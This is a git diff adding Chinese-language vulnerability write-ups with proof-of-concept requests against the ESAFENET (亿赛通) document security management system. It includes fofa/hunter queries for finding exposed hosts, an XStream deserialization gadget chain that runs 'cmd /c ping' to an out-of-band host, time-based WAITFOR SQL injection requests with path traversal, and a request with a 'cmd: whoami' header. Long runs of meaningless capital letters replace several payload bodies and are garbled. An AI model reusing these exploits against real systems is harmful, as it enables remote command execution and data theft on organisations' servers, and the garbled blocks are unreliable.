OGPEAFAKFJCALDHMICDCIHPICLPEANCLCBKOIAMEHHLFIJHPEACFCPDDKCJHMNDBHEHLHBHHPEEACDMICBKGDHODHPCMLAMHOEJKAOODJCIPGMOCGPOAFJDDLGCENAKAFDBDEOKAGLBHJHEJEHCCJEFMIFNJDPDFNFFPAOLIHNFLJDDECGLCJNEEACCJDHPKOIJMOJOPDOKIGOPKMOHHPNOLCDHMOOFDKKBCBEPJPFJBDOEJBCODALFBPMGFPHEMFIBCBEMCANBOMOAKAIGFHJAKKGGAMDPDFMHEEDFHOHKABHBEJFEGAEIPMBPBIHIABBILCOGDCPKHJIPBLC
LJEENPKOJLHMALCEKELIPFFLJNNBINAPPOFHPEJDNNILKCEECPJIGJMKEJCNPEKJMDKPLLEHDDIGKKEDEPFHIJKKPNBBAJAMKNMNHIJFHBCKPKAKMAKCHMJJPFMFCFBKJMMEBABPCGCOCNKBJJPLMPHPJFLJLDABHNFFBOIGNCOFHBMFKCKMMENEJCPDOBPMAIDHBNKIAIGKAAHDCAIBLBKPNNLBNMEDCCOBGMDMAHJPPENANOCILDNELHNCIEAOMGKLMCLLEDDPNLDJNBFPEJOKCNNCJHKAPOCGFGENACAGBNBDEIAMGCCGKDNOLNKOCNMMABOMGGKGOFFOLKALPKFNMJJMEMMBBIAAFAAFPIBBDLOENGFIJJAFHNKKIDCGJNIGAFPCPDHPJAKCEKCCKDAIEDJCIJGMJJLEOEDELMJJMEJCCNEIMPDKIALLHFJNNGHOMIJIDPOCLOMECDFMEPAGLKNKEAPKHCBCFDINJHAGJAGPCGEJJEFAABLOEHMDIIGNKKDIILLFGPMBOIKEAAAJGPJHFGAFFPFEPKIKLKBMKLODNLBMFIEFPGAGFPCDCPJACDAEHCFOGEJHHLLBLBBDDOEEJJBPPHDCCOGPOPFOPCFJKBGCNCLLHNAJKIKLHKKIJLAIKBHCMBODNCPCLNHDLMHDPNKGIBANJJHCFLIMKPFOAIEDBDMIBEEPIHODEOLGAJHBNEOGCKIBMGIMJKLAOFAIACFJGOFEIBIOOPDCDCNFIOGCDKEGHEIAOBDCKLLGMEOEKIEHCEBFKAGOLFGCMNLNMJCNJMDBHMDPEGHHFKOJDDAPPHJMBLBDODOHKPNABBMBHMCCMKINKJLCIFBIPCENLPLOFOAJPEFHCDEOGLGFHNOBFFLHDMHNEFAIPMBJJMIIDAEAJAKGDIHIOIPIOPBJKOLEHJLBIOLGLBMHNCNDAHOGDOILIJANBPNLPPKCOKJFJPCLFJPGKDCBMGEOGGGANMMKDILOMJJLPKJJCOPFKPFAHNAIMDOKPCIKNEMFGMGCOGGMKBIBDEKDAKBPBJKPAFGODBFLGADBFNMDAHGLDGNFLLBONBDLAAOIIICMHIPDJCMHBGLFJAIMIBHABENMJOEHJLKGIIJDBBEHFJCHAPPIDAIAILKODLCALBBJNPCGLPKIEOLEOMKEMBLMLBEGKNGCOKOFIPBCFAAHGCIMCAKFFLFIBDHCDFHMKKNDHLCGIMMNKMGOPFDMJHCMOGLKPICOEEDDKPAHLEGOMDMDFLKFECCPILAKGLGDEMGMGEPODAGGJPPNDCHOBPHJKBDAKECOBIOJGKDMBKDBFPEGIGNOBDGELAENFFLCBKHHJADGFGCBAINLJPDMOBGLNNHAOBHGLGMMLDHGINFFOLLALGGAADPGMNJDMNOLKINDIKKIHJKDEKFAJDHPHNGAIBGNAODMICFEFCCHDPGMLJOGIJCIOOMMGEKPILGPFJOCMKILLFGPEAIBIDBGNPPDHLLAHMKLEJBJFBFPFBDNEJCNPK +``` + +![1706606620054-9d6ff741-6152-49d2-ade2-e6e344f15b02.png](./img/yTQ58mMqQbk7Uyqu/1706606620054-9d6ff741-6152-49d2-ade2-e6e344f15b02-796516.png) + + + +> 更新: 2024-04-20 22:01:32 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/cri8yg9zmlzxswvd> \ No newline at end of file diff --git a/亿赛通电子文档安全管理系统FileCountService存在xstream反序列化漏洞.md b/亿赛通电子文档安全管理系统FileCountService存在xstream反序列化漏洞.md new file mode 100644 index 0000000..95ff37e --- /dev/null 
+++ b/亿赛通电子文档安全管理系统FileCountService存在xstream反序列化漏洞.md 
@@ -0,0 +1,102 @@ +# 亿赛通电子文档安全管理系统FileCountService存在xstream 反序列化漏洞 + +# 一、漏洞简介 + 亿赛通文档安全管理系统是国内最早基于文件过滤驱动技术的文档加解密产品,保护范围涵盖终端电脑(Windows、Mac、Linux系统平台)、智能终端(Android、IOS)及各类应用系统(OA、知识管理、文档管理、项目管理、PDM等)。亿赛通电子文档安全管理系统FileCountService存在xstream 反序列化漏洞 + +# 二、影响版本 ++ 亿赛通电子文档安全管理系统 + +# 三、资产测绘 ++ hunter`app.name="ESAFENET 亿赛通文档安全管理系统"` ++ 登录页面 + +![1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6.png](./img/0FvUQBZBTUtW7DR2/1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6-696413.png) + +# 四、漏洞复现 +```plain +POST /CDGServer3/FileCountService HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36 +Connection: close +Content-Length: 2657 +Accept-Encoding: gzip + +IENBCKMHHBGCCGPJPEFFFOAGCOOGHFFDBAMJLPIIMBFKPMJIJKHJCNIMHIOFPJCFAOJAADMKDCLKKCNINDOAOCDHIEMCNKFEJHAAGDCNPIPABKAKCBCMBAPIOJOINBGBKFNMIHCHPKIHMHKCCHFDNFHAEIGDJFNLBKPGCOGKKMMODNADCINGAHENHPLOHHCABLPKDFDLGBKGJKDINLMAJGEDKHNCOCDFONAMKKBHJGKOHBKIKNFCAEGAJKLJGEIGEOEAIGPHPEBLMNHPJCKEJDBMIEOKEEHHNFHKBIKFELMGLCBPHCAODNFBCGIOJFGECNLKNDFMDGBACCEIGEHHLOGPCIPLIMIGFKNEDFGFKKLKCEOHEJEENEKGFDMNIMHGLPOENCPNPHDHAIIKELIMIOOIDPGFCNGBPJNPEIDCDEPHBMPNFCHCJICOGDDENICOEEEBKFLOAEFKBFPJKNLEBCBLGPHLDAPDBKGNICLNNBLGLICDFAILMEJEDMIGFOGEIHFGJCNDGDKLHBDMFGGGGLMHDNBFECEIDPLGPNJMKHINBNJABNMNCHGAPHJOCBPNDDBJMADOIPFHDDECBIHMPDOIPCADCKOOBAMBPHOLCEOJNBFAOFGCOFKILCBPJGFLOLAAICBCAEFFKLOPGOBANGPHILDODOJNHNOMHKIDACOCGHODPDBBMBKFNEFPACOKBFNKNFNCFIPINBHKBMMGADELHLKDOHDMAMCAJKKPHFLNLIEEAJHIMMCBMGNFCDFGMGODECPJFJMDLOKOEKGJMMDHCBABGAPMHPNHGEFCKGMPIGBEJLLCCPBEAJFIALANKKAPKGNKNELJDNJMAKGOHNDCFKGOAPDDMDHNICGPEFONKBEFCOGPFFBEMMHEMIPBLEJFJAFJINIMMKGHBHAGDBMHHIINDNDNOHGOCAGIEAFEMHBOGEJNMKEHJIMANMICIFKMHJIBJBFOCGOFKIGBFHCIGCOCEAKECKBBDHFFNLAIHBBJIDBMCACIBMPELHBKJOBNMJHFGFDONBHIDABKIFFLFFONJAGDOEHEDLILAFKGHMFEPDJBMKCOBLFBBPKKFJDBAFLIDEEJIGCILEJCPHMPJDEAFLDCGFIBBIAIJELJELGGJOGKKGFJAPBPHDOPDGGNPLEDJOJNNNOLGCEMBLECPLOEDPOEAKFPALMOOEOJCJOOIDFDJMNAAMBMDOFKEHAGPGMCFOACPGHKDBDLHALONFAJLOGEIFKMHJI
BJBFOCGOFKIGBFHCIGCOCEAKEENNMJNJDLNKCCGIMKEDFNNGMAAENLKHONOPHFBIGELCBHLDIBFCOKJKEFFFEODJJMONDDDGIMIJAEPCLOAIKKJFGEOGEKHOHKABBOEFEHMGJPDFBPMCHPBIBOAMAGPOBICFGGJGFBGLJFONGBGHCNMDLHOPJHFDCMIAFFOKBKCGFEKGAGGGCKEOEOGCJANKKIBKJBMIHLGJIMELPHHCDFNNDAHKHMMHAPLIEEEAHPMLOMKBBMLNBMFEIFIODPCIHEPGGDNMIGEJICGKKCKNPOGPDCENCPIGEJOJEGHHHHLIGIEFIDHHBADCOMLOILLCMNAGIPHJNJNINNGBOIJEIIEBCKHNDBBIJIBHMPHMCFDGLAKAIJCDCMLIODBPCMCMHGDGODKBCJIGEHMLNFIPFDIHELCJKNFIFONFHIHIPKIFBCNDBPJLHONIMGOLOGDHAMKJNBIHCPOJHBGNBNJGHJFNNDHBNEMGHOKFLBFLKIIOBKGCCKJHMHMJPCHDHMHDNJPKPEPKKDEIBPCCDOBAFOKAIOHJGDKBNHCMKEFCBEHLMIKKKMMIJFCHKHINFPGPACDAAEPEJLGLJOIBODGCPNIHMFDJPMJBOFNPDDLNCEIDDNKBINIELBKPIBKPBDPGGGAMLLLEICHDCBLFKFKNJENEFNIHHPPCDKMBPDOPNAICNNDNPCCMNOJCOFHNAPOLNCOJCEMKDDBBDCCJKFMJNEEEOKNMGDCKJHCMKEFCBEHLMIKKKMMIJFCHKHINFPGPACDAAEPEJLGLJOIBODGCPNIHMFDJPMJBOIECONEAJCCAGGKDAAOPCHLHGFGIICLPCPLIEEEAHPMLOMKBBMLNBMFEIFIODPCIHGOKEINIBDALBDPHDGABDBLOKCPCLJBGEBJABHBJKKMPKNBOACJOEDCGLHMLNJCIGPDENPGODCDFMLKCFJEMFDONJKPJFMJKLNGIIOLFNIEKPDLLFDDLFOBDAKJECFNCICGBOGOKMFAPKCNCBHECFFCAEBAKIJKEDGAMLLLEICHDCBLFKFKNJENEFNIHHPPCDIBOKPKOPNMOGLJIPHKOBOABIDKNNAJMOCAPLIFHINJHKLJCBOBCGOIMDKJBABCMDAEIAHAOKMBAPHMAMJEHADCHNLLMFBJBHBHHNLELIFCBNHACHNAFCIOAKOLJJBOGNIGMCEMOBKNNJCKAIBNFMALPKNACFCNIMDIFAKBFCCEMKLBOJNJJMGFPKFAMFINCIIDIGGANFCJLEEIFNHGEDLCGOADFFKBFMKLGFPGKOFOBJDPKOFABICCDOCHGKFLPHEHJJPOHBKABNIPLFDBLOHBEPEJHKJGPPIFKMHJIBJBFOCGOFKIGBFHCIGCOCEAKEABDPFDCBALFHCJFFCIFMMCGDJFOBBMIJDABFJEBOINJFJIEMNKLMANHBJACCEMAAEJIAHGENPCCOIPMINBLODFHOEFEMMMNLANHOFKKGLONPGFFCCLMHPIBKOEGEJEOFNGLHFFFCJPOBKBAEBOCJJHOHFCPDFNPDGKNOGJCFAHOBHBLMEMEFCBIJIPAPGODFOGFOFCHHAJKGFHFAFMAFJFCAMIAIGJAPFNPDLDFLDOBDHGJFPPANDAIBBGAHHBCIGGBILAMDIAEFNBJIDBEKEPFAHJKKCADDPCKCEPNNEJOLDKABIAPEBOIINFMDPDHEPFOMCIFMBKHPAHMIGKEIPPCDGJNIEAEIHOKGFAGPMFAONMIGECMBIMFFDEEEOBHGIFKMHJIBJBFOCGOFKIGBFHCIGCOCEAKEAPPGKFOOOBKPEGIAJOPBAHGPPLGCKEGBJGJPFKGNECMPFABADCPAPIJOCJEMFCEEBHALEIHPAIAMOGIHJAJKJLJMADMOOCEGCAPLIFHINJHKLJCBOBCGOIMDKJBABCMDHEHJFDDHJMNBBGOPGCELILLONJNFJKDKLMEJOGPIMPDIBBMPMALGJPH
EEDDAHKLAHNGJBMHNLJLJCKIGOGLGPGEPABONGLEDGJIEMNOLFBFNJKJBAMKANBMAAGMNAJOIMPCIBBDEMMJEANGBHHEDELPBGIKDLAMHLPHOPNFNPLKFCLHADEDOJEBIMNIOGEEHKLGFPGKOFOBJDPKOFABICCDOCHGKFLPHLKKOCMJJOGMFNIDPPDLHBNGNEMFEIMIEDFJPMFEIIFFHGFIEGMGBLFKKPGJKKOBMFIHCACNMDEHJLLOANAIHAHFGELFEOJMABALGMENKFNBNPMLDIKPJHBKGEAIBGDIMIAGDAIENNHBABAEGJGPFIFHAHOOPOCKBLNJPJACLFAAIMKFDMFILOFBMAPJPJMOHNNMANGFNJEMNFBJCCNGFLICOKDMHACNPEPGCHIJOKMKPDBJIKFOMPCNBILHGLJJJALBPNBBBLJLNALCKBJBMOHOPIPFKPAKOBALGMENKFNBNPMLDIKPJHBKGEAIBGDIMNNIKHPBFJAKOEEPBOAIIKOEICJOMCGADMMKJNGNAKEHMDDBMJGGLJLGHLAIOIFBLHLLLCIEMKHCBANEHPHAMPCPJACHMBGPHMMMBCKFHHGJBBBGFIHENAKJEHOOACLADMKFJIDGEHNANAACDIGJDINCAMEHOIIPJHAAIBIPMEEHLIOBHGMICGAALCEKFNFNBJNACEHDMDEGCPMNPAAFFHHJKMPMADKBBLGKKJMEJDKAHLEKIDFPKLLJENFDHJDMPKFGNGKEBJBEBPLKCHJMCBALICLGNGDCAMFNCNJGFIEODKPOBNJHGIIICPOGICEBIJFLCIHGOELNDCLIMKJBLGOAONEFFJKOLFLLIDOEJAECJPDPJHAGFNDAPGEGNPJODCPGFMAJHIINKLILMALMNEFHBGHMGGODBKFPKGPIAPMFEJOANAHEIGFJNOOMAOHKBIGLFEJMDICOLEAPNJIPDBMHLOCFBCBDKKAAHBEINNPFDAGOOKOAPFCPHDKNBNIAOFIBFBKLBFAKICAOJPOKPJNDEHGEHAMMEEKKIOAANIDMOAGKEIBNCKPMLPJGDMONAPMAGGPMDJIPBNDMPDGINGBCGEPDDDINPFJHEKKJIPPADMOKJPIEBAIBCJBGOJFEBLHNBLFABAMDPFDEANKPDEAENBLGIMIMLKBDFHEFHHJLPGGBENHGMLGLPJMPMPFEKGPFBJNBOCCHKEEHAACFLJKHAAFGIPAGLFEEIKMICBBDONOABFHNMGHPLKOEPPBDDGKBNCJGIFJECLHGBLHDIEJOIAILLEJNJGPFBJNBOCCHKEEHAACFLJKHAAFGIPAGLDAGMKNALPEGPCBCPBKEAAEKPLHIEKGLGPCAFBBPGHBMBDLMPHIOPCNNMFPJHKNINKHNJANGIHKHEDDGKGEFJIEPOCGFGLALANFMLAAJIFPIBIJBAFBHDDOJPPAHMFPGNMPGBJKFBCLEMAGKMJGMENMFPMDHKAFFKKNHNICEPICAPIBAJHFKDHHNLHBAGHJFEFEJELFBJFOECBNGODBBKBANCCABIPMGJABODCIMNPOAECKBECOGDJJDNKLJFGDNGFAAIGDEBMFIFMLBAGHJNNGJACPKEMENKDBIMOLFAEAGNFOFEFNHJMJFDEDCJAGGGPFOHNHIIDJLMFNGHLPEENAGKAEBAONIMGPFBJNBOCCHKEEHAACFLJKHAAFGIPAGLKCBFIGPBJLEODJIOPEALFLKCAJPFKMLONOBAMEHEOLAMHEOGLFJAOPGOCJPMOJCACFDBCMGCFNNLHIEPLOHLIICJAAKINIBHEHPLBFNMFEINBBMHMAJKNDFEPJFCPEOCGOHENHIAHNBBPAAICKCDAOJMMHMDDAANEAIPCCGLLNFIMFHJKKGFLMHILLMLEGFIPABOAMBDDEBCHEHPLHJHNDFCNBFABAPJANNLLHLNNNLLIAIHKHGDPAJOJOAPIPGNJNIHDKKFPNMKDCEKHAFJFKPFOKLFABGEBOFLFCG
CCJ +``` + +![1705077486607-cd243520-9faa-4092-9449-cd3391ce2eea.png](./img/0FvUQBZBTUtW7DR2/1705077486607-cd243520-9faa-4092-9449-cd3391ce2eea-856627.png) + +获取命令执行结果 + +```plain +/test.txt +``` + +![1705077513733-b7abd167-6797-469e-b228-3d58e55f8f37.png](./img/0FvUQBZBTUtW7DR2/1705077513733-b7abd167-6797-469e-b228-3d58e55f8f37-825432.png) + +```plain +<map> + <entry> + <jdk.nashorn.internal.objects.NativeString> + <flags>0</flags> + <value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data"> + <dataHandler> + <dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource"> + <is class="javax.crypto.CipherInputStream"> + <cipher class="javax.crypto.NullCipher"> + <initialized>false</initialized> + <opmode>0</opmode> + <serviceIterator class="javax.imageio.spi.FilterIterator"> + <iter class="javax.imageio.spi.FilterIterator"> + <iter class="java.util.Collections$EmptyIterator"/> + <next class="java.lang.ProcessBuilder"> + <command class="java.util.Arrays$ArrayList"> + <a class="string-array"> + <string>cmd</string> + <string>/c</string> + <string>ping</string> + <string>cnvd_test.zfdaqyzxch.dgrh3.cn</string> + </a> + </command> + <redirectErrorStream>false</redirectErrorStream> + </next> + </iter> + <filter class="javax.imageio.ImageIO$ContainsFilter"> + <method> + <class>java.lang.ProcessBuilder</class> + <name>start</name> + <parameter-types/> + </method> + <name>foo</name> + </filter> + <next class="string">foo</next> + </serviceIterator> + <lock/> + </cipher> + <input class="java.lang.ProcessBuilder$NullInputStream"/> + <ibuffer></ibuffer> + <done>false</done> + <ostart>0</ostart> + <ofinish>0</ofinish> + <closed>false</closed> + </is> + <consumed>false</consumed> + </dataSource> + <transferFlavors/> + </dataHandler> + <dataLen>0</dataLen> + </value> + </jdk.nashorn.internal.objects.NativeString> + <jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/> + </entry> + <entry> + 
<jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/> + <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/> + </entry> +</map> +``` + + + +> 更新: 2024-04-20 22:01:34 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/xyoufkqvrrixgyhy> \ No newline at end of file diff --git a/亿赛通电子文档安全管理系统FileFormatAjax存在SQL注入漏洞 2.md b/亿赛通电子文档安全管理系统FileFormatAjax存在SQL注入漏洞 2.md new file mode 100644 index 0000000..772fa45 --- /dev/null +++ b/亿赛通电子文档安全管理系统FileFormatAjax存在SQL注入漏洞 2.md @@ -0,0 +1,21 @@ +# 亿赛通电子文档安全管理系统FileFormatAjax存在SQL注入漏洞 + +亿某通电子文档安全管理系统` FileFormatAjax`接口的`fileFormatId`参数处对传入的数据没有预编译和充足的校验,导致该接口存在SQL注入漏洞,恶意攻击者可能通过该漏洞获取服务器信息或者直接获取服务器权限 + +## fofa + +```yaml +app="亿赛通-DLP" +``` + +## poc + +```javascript +POST /CDGServer3/js/../FileFormatAjax HTTP/1.1 +Host: your-ip +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 +Content-Type: application/x-www-form-urlencoded + +command=delFileFormat&fileFormatId=-1'waitfor delay '0:0:5'-- +``` + diff --git a/亿赛通电子文档安全管理系统FileFormatAjax存在SQL注入漏洞.md b/亿赛通电子文档安全管理系统FileFormatAjax存在SQL注入漏洞.md new file mode 100644 index 0000000..acb06b7 --- /dev/null +++ b/亿赛通电子文档安全管理系统FileFormatAjax存在SQL注入漏洞.md 
@@ -0,0 +1,55 @@ +# 亿赛通电子文档安全管理系统FileFormatAjax存在SQL注入漏洞 + +# 一、漏洞简介 + 亿赛通电子文档安全管理系统(简称:CDG)是一款电子文档安全加密软件,该系统利用驱动层透明加密技术,通过对电子文档的加密保护,防止内部员工泄密和外部人员非法窃取企业核心重要数据资产,对电子文档进行全生命周期防护,系统具有透明加密、主动加密、智能加密等多种加密方式,用户可根据部门涉密程度的不同(如核心部门和普通部门),部署力度轻重不一的梯度式文档加密防护,实现技术、管理、审计进行有机的结合,在内部构建起立体化的整体信息防泄露体系,使得成本、效率和安全三者达到平衡,实现电子文档的数据安全。亿赛通电子文档安全管理系统FileFormatAjax存在SQL注入漏洞,攻击者可通过该漏洞获取数据库敏感信息。 + +# 二、影响版本 ++ 亿赛通电子文档安全管理系统 + +# 三、资产测绘 ++ hunter`app.name="ESAFENET 亿赛通文档安全管理系统"` ++ 登录页面 + +![1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6.png](./img/ArO4K6L-C-r-Uxgf/1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6-628978.png) + +# 四、漏洞复现 +```plain +POST /CDGServer3/PerOrgServlet/../FileFormatAjax HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Connection: close +Content-Type: application/x-www-form-urlencoded +Upgrade-Insecure-Requests: 1 + +command=delFileFormat&fileFormatId=12';WAITFOR DELAY '0:0:5'-- +``` + +![1706854421336-072c0e24-f509-4147-b269-327ad3ae199a.png](./img/ArO4K6L-C-r-Uxgf/1706854421336-072c0e24-f509-4147-b269-327ad3ae199a-597539.png) + +sqlmap + +```plain +POST /CDGServer3/PerOrgServlet/../FileFormatAjax HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Connection: close +Content-Type: application/x-www-form-urlencoded +Upgrade-Insecure-Requests: 1 + +command=delFileFormat&fileFormatId=12 +``` + 
+![1706854564781-683677a7-30a0-4665-95a0-f5419f289abd.png](./img/ArO4K6L-C-r-Uxgf/1706854564781-683677a7-30a0-4665-95a0-f5419f289abd-491883.png) + +[亿赛通电子文档安全管理系统-fileformatajax-sql注入.yaml](https://www.yuque.com/attachments/yuque/0/2024/yaml/1622799/1713621695064-99d7fb48-d6e7-42fc-a035-876619e42867.yaml) + + + +> 更新: 2024-04-20 22:01:35 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/zxyf40yyez20bg4g> \ No newline at end of file diff --git a/亿赛通电子文档安全管理系统GetMakeOutSendFileInfoService存在xstream反序列化漏洞.md b/亿赛通电子文档安全管理系统GetMakeOutSendFileInfoService存在xstream反序列化漏洞.md new file mode 100644 index 0000000..9d75228 --- /dev/null +++ b/亿赛通电子文档安全管理系统GetMakeOutSendFileInfoService存在xstream反序列化漏洞.md 
@@ -0,0 +1,36 @@ +# 亿赛通电子文档安全管理系统GetMakeOutSendFileInfoService存在xstream 反序列化漏洞 + +# 一、漏洞简介 + 亿赛通文档安全管理系统是国内最早基于文件过滤驱动技术的文档加解密产品,保护范围涵盖终端电脑(Windows、Mac、Linux系统平台)、智能终端(Android、IOS)及各类应用系统(OA、知识管理、文档管理、项目管理、PDM等)。亿赛通电子文档安全管理系统GetMakeOutSendFileInfoService存在xstream 反序列化漏洞 + +# 二、影响版本 ++ 亿赛通电子文档安全管理系统 + +# 三、资产测绘 ++ hunter`app.name="ESAFENET 亿赛通文档安全管理系统"` ++ 登录页面 + +![1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6.png](./img/w2S5lXWsKhKjT4IE/1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6-631956.png) + +# 四、漏洞复现 +```plain +POST /CDGServer3/GetMakeOutSendFileInfoService HTTP/1.1 +Accept: */* +User-Agent: Mozilla/5.0 +Connection: close +Accept-Encoding: gzip, deflate, br +Accept-Language: zh-CN,zh;q=0.8 +Content-Type: text/xml +Host: 192.168.110.187:8090 +cmd: whoami +Content-Length: 14756 + +NNLINELBIIKEOGPIFLNMHIPNNOHFNECLEHKBCIHIFHCMONPDPHOHMONIOCNLPBOKNAEEBHFCIFNMDPDAACABKCKIAEMBPOIBGPMNEIPJAOGBILDKMLDGAENLPAFBKFPFELKLGCEBMBMNKOIBMPHCIODCCEHOKPCEDHPNLONIODEGNCPIGDFMGMDPOMMEDIJNFKDCHHBFMFGBDOIOAHLOHNAMDBJABECIJOEHKAPJCBDIDJHKAMAGEELEHJEEIDBDILILANAKCIIGLMDIDDMOPNCNGLPPOMMIGCEFEBIMDHFAGLHIDHPJCHAEHFPHNHJGJKJDCINLAHOAPCDJNIABODKBFABJMFIEMLLPGGKNNNFCAOBHCOEOHCBFOFGBBPLKPHLLNOCJAKJDJPOEPBEKKPHOPBHFLJLNOGLABIJHIBOFFCPCLPAGLCEAONCAGIJFAEFOLKOLENHNFBOJIAOFJKBFMGNKBEECKKJPCECMFKPPPKEGOIOBHIBIBAGBIKAMOFLEKDKODMHGJOCEPEBNIHPFKEKKMCENNPHEODFNIOPMHFPPNFFIJEEJPPIMGPKHDOACKEEJACLCOKIPFHHECFDFJNMIFNGHLCOFLPDACOOALCNKBOEBPNPCKCKNJJJJANLFPKGLOINAIODAJNHAEDLBNONDJHPFELIJMNLMHEMBFGOHELCDBFHIFALDIIMBFEOHNHBOIOMLCJKCPHJPNDLPHDDCFJNMGKDMEINHIDLEGMOCNAFDAHOMPPIFFBPFCHAPPIDAIAILKODLCALBBJNPCGLPKIEOLEOMKEMBLMLBEGKNGCOKOFIPBCFAAHGCIMCAKFFLFIBDHCDFHMKKNDHLCGIMMNKMBJDGIDJMMGEOEGJNJDNNEKFDMEAHMILDKIFBGKGEJCMGOFEKGJEMNAFLDGEEOBKOHADBAMHBMDJOGIFPMDKIILIGAEELNEOAKNEFHDOGHOPBDICEALJIENFKHFCEHMPBJLCFPDHDGBBFIMKHLLFIHONFDJAIEJJLPPFMAEHBHDEBOIDLCMCIKAFBEBFEBGJEECDEINCPNPKIENONIMPBJCCMCHOAJHHDKDKEGJGDGJDJIDEHNNLNNHEONJEJHNLHLPMBBEJDLLJLLNPKIMGHLOFMMKBDEBHNFLPGEOKMHOFNBLLAALGMKNJONNGIOJLBFECJNLKHMBC
KELDPBDMBFEHAKBHEMNDFBBEDCAMMHNNGMDGLNJHJDAGPILNGBEDCDJBCJOAMOBIFLOFCFIJKDELPPFLFBOHHNIBEGOOFEFGAENOKBMPCBDELFJPAHICDPGANJALHFENMFHAJLNECAEGOGCBOIDLJENHCEDMAOEEOFKLDEBJEJOBCFLPEIEAGPOILBEGOKPOAAPGMICFMFLJNDMBGAJJPKNLIBOAABJLNADADNALIKHDJMDKGOPELEHGPDGNJHAAJKICHBFGMHCLEPFHCCKNFKPEOMHPLMOHBGDHCOGEIGPMIGLAHKBCEDHFGLDIKIIIMEPHMIMCIGJJDCKIEODLKCKOLAKBFHIBHOPNAMPEIKHCMDPNMLACKHOGJAEMBJPFEBOCPBGGAFGGNCOBEAIPANPLIBGDCCNMDNDNOIPOECCPELCEDPGCNJHEIOIFPJDKIFNJGHAHLHFNPICIJLHELMODMJIEGMMBNMMFBEJCDDDFOPAJOMBNKBDBGKKMLKCBBPFOOJCKFFIMLCODLOFNOIEHENLJNOFDAMKFLHIADBNGANHIANHOCHLILNJLOCOHFHMNFHALJHOPGKLOPHLMELJFBIABENFKEHCLIKMFGHPPJFIBBANPIOFKEEBIFIBDIIAIKENFILIDPDELJDMOPFKBOHPGLIPMNCFJFDCJGKCFOAJMPIIBEOHJPPNHLOCINIECHMJJMCKHICOMIMLHJAOJIGIFLMINANOFADOGDLLHCEKPECHDFBGIPEPNJBJOGLHDLKFLBFPLPFAENMMIFOMMNCJGJJFPGFHOKMAGCEOCKMJJPPAFBNEAKOAMMEHPGCBAJCHDBGJANBBHGIBMPHAMCEHEFLBAGOKDPKIPPDFLJIADKKOJPEPIGAKPCGKBNFBPLLKLEGBPJJCDJFGHDMLPNJBGFMLGMCABONHBLHPKHKEGJIBPFKCLMBIKKOMINPAJEPFHANBIBKMPHKEODCBMMIGAEFCENBNKDONGNLBADGDLJBMJGKEMNJOMPHDOPALIGEPCEDDAHJMNMJBFLIPBODEDCDAPMNGCANOCPLLMJOCPMPJDMEAMEPELICJKJLODAJEILBOJNFAJOFNOGCHGOJEGMGCPNCDEECKPAIAOHCLJBBFDKKAIHOJEKDBOFMFOBEDLNGJNIAJPLGMHBLHODIKDLEPOINDPDDIGKOLGEOBFFPMOHLBEALFIGAKNDKEKEJMJLNGHNANLCGLPNLBBFNKNEKCGBJKJDABFNAGPDILHBAAIECKBLKEDIJIMPJOMFLHBMOBLEKNEHINHAKBOHICLGBBPIEJIKALMIJHKHFIDNICAEEFPGGPBCBFPOJDFFKAGKAEOOCPMGCCMHPCIKHCODDCNGDDNDLAIMAPEMPNECNFPIALJELGOIHECEKHBHOHNIFCBJBFAOKKDCMNHHINAFGNECFPOGHBNMPJOECCFOCHICANBDOCCELJCENBMIMBKCNJAEMBHLOJOGALHGLLOEBFGFJAOFJHEGNLCEBCHGLNFEEIDOKIJNDHDANFPGLEMHOIJHOOJGKLGHBFBMBPBKEFOAKAIAGDMBLDEKLFKADKHNPAKBNPDKFIOAMAKKEHFNDABEPGKBMFCDFFOCIPDDEBOBFONDJFAJIJBAMGNBMCMJODGEGKIMIOLLAKMKJJAOCEMOBDCODALCKGKKKIADHOFMLNDGJBEMLLJPJOKPAIDACMPCOKAGKLIIMDENPNMEIBBMIFHGJKLKGPNOBJGMMLDKFKALLFHFDGDBDBMPOPDBLDNMAALEMAHGINFECKFHKJHFOCDJNBEDNGJCNENGIDHBJOLHEPFLEPHOOGJKFEGFLEMLGKDOOKIMAJIBJKOLAKCHBJJFDIGEMPABDNJFGMDAGEDIOHJKOAEHPLIBOFLIMFIEFOOGDHDNLCKOKPEDKEEBPAHKFMKBNNBAMICPOPLNPIGLMPDLAFBIEPHPJBFLBDECCPFINEBGMPMECAICGFLMJEK
